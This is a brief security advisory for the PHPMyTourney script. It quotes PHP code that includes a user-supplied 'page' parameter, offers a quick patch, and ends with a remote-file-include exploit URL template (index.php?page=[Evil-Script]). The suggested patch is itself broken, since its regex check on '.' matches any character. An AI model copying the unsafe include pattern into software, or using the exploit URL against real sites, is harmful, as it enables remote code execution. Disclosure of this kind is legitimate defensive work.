Hello PHPMyTourney Remote file include Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@xxxxxxxxx home page : http://phpmytourney.sourceforge.net Script : PHPMyTourney vulnerable file : phpmytourney/sources/tourney/index.php code $page = $_GET['page']; if(isset($page)) include($page . '.php'); else echo("must specify a page "); lines 45-49 fast solution replace with if(file_exists($page . '.php') and !eregi(".",$page) and !eregi(":",$page) and !eregi("/",$page)) { include($page . '.php'); } else { echo("must specify a page "); } phpmytourney/sources/tourney/index.php?page=[Evil-Script] #WwW.SoQoR.NeT